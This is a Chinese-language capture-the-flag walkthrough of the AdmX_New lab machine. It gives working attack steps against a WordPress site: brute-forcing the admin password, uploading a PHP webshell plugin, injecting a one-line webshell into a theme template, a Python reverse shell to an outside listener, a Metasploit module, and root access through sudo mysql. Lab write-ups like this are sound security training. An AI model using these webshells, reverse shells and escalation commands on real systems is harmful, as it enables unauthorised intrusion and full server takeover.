04 - AdmX_New

0x01 下载地址

0x02 靶机目标

取得 2 个 flag + root 权限

0x03 工具准备

密码字典

https://github.com/fuzz-security/SuperWordlistgithub.com

蚁剑Loader

GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器GitHub

Python反弹shell：

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.104",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

0x04 详细步骤

主机发现

sudo nmap -sn 10.0.0.0/24

端口扫描

sudo nmap -p- 10.0.0.105
sudo nmap -p80 -sV 10.0.0.105

Web目录扫描

方法一：dirsearch

略

方法二：dirb

略

方法三：feroxbuster

sudo apt install feroxbuster -y

#由于feroxbuster本身没有内建目录字典，需要调用seclists中的字典，所以这个也需要安装一下
sudo apt install seclists -y

feroxbuster --url http://10.0.0.105

经扫描发现的可用目录为http://10.0.0.105/wordpress/

浏览器访问http://10.0.0.105

通过浏览访问http://10.0.0.105/wordpress发现该页面经过长时间的加载始终无法完成，所以需要通过Burp抓包分析网站加载过程。

Burp分析（Match&Replace）

通过Burp抓包分析发现，该站点加载过程中会向192.168.159.145申请加载JS资源，故造成站点加载速度慢

为解决这个问题，在Burp做如下设置：响应头部和响应体中192.168.159.145替换成10.0.0.105

再次刷新浏览器，页面加载正常

但在前台页面并没发现更多的漏洞。

爆破管理员密码

再次返回查看目录扫描结果，访问http://10.0.0.105/wordpress/wp-admin，确认找到WordPress后台管理地址

经测试，该登录入口不存在SQL注入（万能密码）漏洞，故采用暴力破解的方法

测试用户是否存在

输入正确的用户名时：提示密码错误

Error: The password you entered for the username admin is incorrect. Lost your password?

输入不存在的用户名时：提示用户名不知道

Unknown username. Check again or try your email address.

开始密码爆破

使用Burp截获提交登录密码的包

发送到Intruder，只对密码进行破解

设置Payload，加载MidPwds.txt密码字典

经测试，密码为adam14

登录管理员账户，查看后台管理页面，查看WordPress版本为5.7.1，主题为Twenty Twenty-One

WordPress系统GetShell（3种方法）

WordPress可能存在GetShell点

Media>Add New>上传Shell
Appearance>Edit Themes>404Template>直接写入一句话木马eavl($_POST['cmd']);
Plugins>Add New>Upload Plugin>上传一个自己手写的插件

cat shell.php
<?php
/**
 * Plugin Name: Webshell
 * Plugin URI: https://yuanfh.github.io
 * Description: WP Wehshell for Pentest
 * Version: 1.0
 * Author: yuanfh
 * Author URI: https://yuanfh.github.io
 * License: https://yuanfh.github.io
*/

if(isset($_GET['cmd']))
        {
                system($_GET['cmd']);
        }
?>

zip shell.zip shell.php

访问一下上传的shell

http://10.0.0.105/wordpress/wp-content/plugins/shell.php?cmd=id

已经实现系统命令执行

反弹Shell

kali主机监听5555端口

nc -lnvp 5555

靶机上是否存在nc、python3

http:/10.0.0.105/wordpress/wp-content/plugins/shell.php?cmd=which nc

http:/10.0.0.105/wordpress/wp-content/plugins/shell.php?cmd=which python3

http://10.0.0.105/wordpress/wp-content/plugins/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.0.0.104%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

反弹成功

使用MSF反弹Shell（功能不完整）

启动MSF

msfconsole

search wordpress admin

search wordpress admin

use 2 # wp_admin_shell_upload

show options

set PASSWORD adam14
set RHOSTS 10.0.0.105
set TARGETURI /wordpress
set USERNAME admin
run

但这个Shell功能并不完整如pwd，ls等命令都没有回显，所以依然选择使用Python3反弹的Shell

使用Python3反弹Shell

在404模板页面写入一句话木马

cd wp-content/themes/twentytwentyone

vi 404.php

但功能依然有缺陷，vi编辑器输入显示乱码

升级Shell功能（只适用于Bash）

切换Kali默认SHELL为Bash

chsh -s /bin/bash
reboot

echo $SHELL
/usr/bin/zsh

chsh -s /bin/bash

待系统重启完成后

echo $SHELL
/bin/bash

按照之前步骤重新使用Python3获取系统WebShell（过程略）
按下键盘Ctrl+z
stty raw -echo
fg
系列命令

ls
export SHELL=/bin/bash
export TERM=screen
stty rows 38 columns 116
reset

再次编辑404.php模板

cd wp-content/themes/twentytwentyone
vi 404.php

可以正常使用

使用蚁剑连接Shell

连接地址：

http://10.0.0.105/wordpress/wp-content/themes/twentytwentyone/404.php

设置蚁剑参数

成功连接

关于Shell的建议

Tip：一般系统的Shell都较难获取，一但获取某个Shell权限后，建议多种方式，多挣途径，多准备几个Shell，以防Shell权限丢失。

系统提权

前期通过系统信息收集该系统存在wpadmin账户，内核版本5.4无法提权

通过WordPress配置文件找到了数据库配置文件，找到数据库连接密码

连接数据库用户名admin、密码：Wp_Admin#123

尝试切换wpadmin，并使用adam14密码登录

su wpadmin

登录成功

在wpadmin获取第一个flag

cd ~
cat local.txt

查询用户权限：

sudo -l

该用户不需要密码 sudo mysql

sudo /usr/bin/mysql -u root -D wordpress -p

输入密码adam14

成功登录数据库

Mysql提权

system id

system /bin/bash

cd ~
cat proot.txt

上一页03 - CHRONOS 1 下一页05 - hard_socnet2

最后更新于2年前

这有帮助吗？